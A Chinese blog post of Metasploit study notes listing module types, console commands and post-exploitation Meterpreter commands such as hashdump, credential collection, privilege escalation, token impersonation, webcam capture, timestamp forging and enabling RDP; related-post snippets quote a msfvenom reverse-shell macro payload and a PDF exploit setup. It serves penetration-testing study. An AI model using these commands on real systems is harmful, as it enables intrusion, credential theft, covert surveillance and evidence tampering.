MSF学习笔记

最新推荐文章于 2024-06-25 07:04:09 发布
最新推荐文章于 2024-06-25 07:04:09 发布
阅读量824 收藏 7
点赞数
分类专栏: MSF 文章标签: Web安全 MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40684306/article/details/106886934
版权

贵有恒何必三更眠五更起,最无益只怕一日曝十日寒
话不多说,上干货。

MSF主要模块

渗透模块(exploit):运行时会利用目标主机漏洞进行攻击。

攻击载荷模块(payload):在成功对目标完成一次渗透之后,这段程序开始在目标主机上运行,帮助我们获取需要的访问和行动权限。

辅助模块(auxiliary):包含一系列辅助支持模块,包括扫描模块、fuzz测试漏洞发掘模块、网络协议欺骗以及其他一些模块。

编码器模块(encoder):通常用来对我们的攻击模块进行代码混淆,来逃过目标的安全保护机制的检测。目标的安全保护机制包括杀毒软件和防火墙等。但由于MSF是最流行渗透测试软件,通常安全厂商都会参照MSF最新的技术对自家的WAF进行升级,导致encoder模块大概率被WAF拦截,实用性不高。

Meterpreter模块:是一种使用内存技术的攻击载荷,可以注入到进程中,它提供了各种可以在目标上执行的功能。

MSF基础指令

  1. 进入MSF:root@kali:~# msfconsole
  2. 退出MSF:msf5:quit或exit
  3. 返回上一层:msf5: back
  4. 查询可执行指令:msf5:
  5. 显示MSF版本信息:msf5: version
  6. 查看MSF详细信息:msf5: banner(拥有模块数量统计)
  7. 颜色风格:msf5: color [true/false/auto]
  8. 连接主机:msf5:connect [option] host port
  9. 进入脚本模式:msf5: irb
  10. 加载一个插件:msf5:load [option] [var=var var=var…]
  11. 卸载一个模块:msf5:unload [option] [var=var var=var…]
  12. 查看一个会话的路由信息:msf5:route
  13. 显示和管理作业(任务管理器):msf5:jobs
  14. 杀死一个作业:msf5:kill [id]
  15. 加载一个模块路径:msf5:loadpath 路径
  16. 查看所有类型模块:msf5:show

MSF常用指令

  1. 搜索查询:msf5:search [漏洞名称/系统名称/服务名称等]
  2. 使用模块:msf5:use 脚本路径
  3. 查看脚本与漏洞信息:exploit:info
  4. 查看脚本设置项:exploit:show option
  5. 设置脚本项:exploit:set [RHOSTS/LHOST/PORT…] [value]
  6. 接触脚本项:exploit:unset [RHOSTS/LHOST/PORT…] [value]
  7. 设置全部脚本项:exploit:setg [RHOSTS/LHOST/PORT…] [value]
  8. 解除全部脚本项:exploit:unsetg [RHOSTS/LHOST/PORT…] [value]

MFS常用后攻击指令:

  1. 文件上传win系统:msf5:upload -r [本机文件路径][对方存放路径]

  2. 从目标系统下载文件:msf5:download -r [对方文件路径][本机存放路径]

  3. 执行目标文件:msf5:execute -f [对方文件路径]

  4. 创建CMD新通道:msf5:execute -f cmd -c

  5. 显示对方进程:msf5:ps

  6. 获取目标cmd shell:msf5:shell

  7. 获取admin权限:msf5:getsystem

  8. 获取服务器hash密码:msf5:hashdump

  9. 使用credcpllect转储hash值:msf5:run credcollect

  10. 创建端口转发:msf5:portfwd add -l [本机端口] -p[目标主机端口] 127.0.0.1

  11. 解除端口转发:msf5:portfwd delete -l [本机端口] -p[目标主机端口] 127.0.0.1

  12. 搜索目标系统文件:msf5:search -f [文件名]

  13. 获取用户id:msf5:getuid

  14. 获取目标系统信息:msf5:sysinfo

  15. token操作:msf5:use incognito→list_tokens -u→impersonate_token "[token值]"

  16. 摄像头命令:查看:msf5:webcam_list
    拍照:msf5:webcam_snap
    开启视频:msf5:webcam_stream

  17. 执行文件:msf5:execute -H -i -f cmd.exe(-H不可见、-i交互)

  18. 伪造时间戳:
    查看帮助:msf5:timestomp -h
    查看文件1.txt时间戳:msf5:timestomp -v c://1.txt
    将1.txt的时间戳复制给2.txt:msf5:timestomp c://2.txt -f c://1.txt

  19. 开启目标的3389端口:
    开启远程桌面:msf5:run post/windows/manage/enable_rdp
    输入用户名密码:msf5:run post/windows/manage/enable_rdp USERNAME=XXX PASSWORD=XXX
    端口转发:msf5:**run post/windows/manage/enable_rdp FOEWARD=true LPORT=[本地端口] **

尐猴子君
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSF学习笔记(10)
Shadow 爬爬记
12-11 698
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf入门学习笔记
weixin_34417183的博客
11-11 198
msf—————————————————————————————————————— service postgresql startservice metasploit startmsfconsole进...
【工具使用】——Metasploit(MSF)使用详解(超详细)
最新发布
2401_84254343的博客
06-25 947
show options #查看这个模块需要配置的信息exploitinfo: #查看这个漏洞的信息show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payloadset RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ipset LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell。
MSF学习笔记(7)
Shadow 爬爬记
12-05 702
msf弱点扫描模块使用openvas引入openvas进行扫描,全命令行,使用繁琐msf > load openvas 导入openvas扫描日志,.nbe格式msf > db_import openvas.nbe nessus导入nessus模块进行扫描msf > load nessus [*] Nessus Bridge for Metasploit [*] Type nessus_help f
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
无人驾驶算法学习:多传感器融合MSF算法
01-28
无人驾驶技术在近年来得到了快速发展,其中多传感器融合(MSF)算法是实现高精度定位和导航的关键技术之一。本文主要探讨了基于误差状态的卡尔曼滤波(EKF)的MSF算法,特别是在相机和惯性测量单元(IMU)融合方面的...
MSF学习笔记(9)
Shadow 爬爬记
12-07 575
利用adobe reader漏洞执行payload 构造pdf文件msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
metasploit的fuzz探索
Yale的博客
02-20 615
Metasploit难道只有渗透测试的时候用吗?当然不是啦~这次实验就来介绍metasploit的fuzz功能。我们以一个ftp软件为例首先加载相应的模块看下有哪些需要设置的设置好靶机Ip在靶机上运行相应的存在漏洞的软件在kali上执行攻击这里如果要加快fuzz速度的话可以在之前设置的时候增加线程数量。这里为了实验效果,就采用了默认的线程数量1 从上图可以看到,fuzz的数量超过250之后,还没到...
msf命令
qq_52469895的博客
05-19 2172
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
msf常用命令
licheric的博客
10-20 3106
1、download命令可以下载远程主机上的文件 命令:download文件名 文件路径to保存的位置 注意:windows路径要使用双斜线【linux向左边,windows向右边】 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令 2、在目标主机上执行exe文件 execute -f c://1.exe 3、创建cmd新通道 execute -f cmd -c 4、显示进程 命令:ps 5、获取目标主机的cmd—shell shell命令可以进入目标主
MSF-Metasploit控制台命令的使用
王先生的蒋小姐的博客
05-18 1811
大家好,我是SuieKa。一个在学计算机网络方面的小白,也是在校大二学生,学以致用,实操记载,博文若有毛病,请一定留言哟 在这里记记笔记,关于msf控制台中命令的使用方法。
metasploit(MSF)终端命令大全
weixin_33863087的博客
09-28 75
show exploits 列出metasploit框架中的所有******模块。 show payloads 列出metasploit框架中的所有***载荷。 show auxiliary 列出metasploit框架中的所有辅助***载荷。 search name 查找metasploit框架中所有的******和其他模块。 info 展示出制定***...
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6872
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尐猴子君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值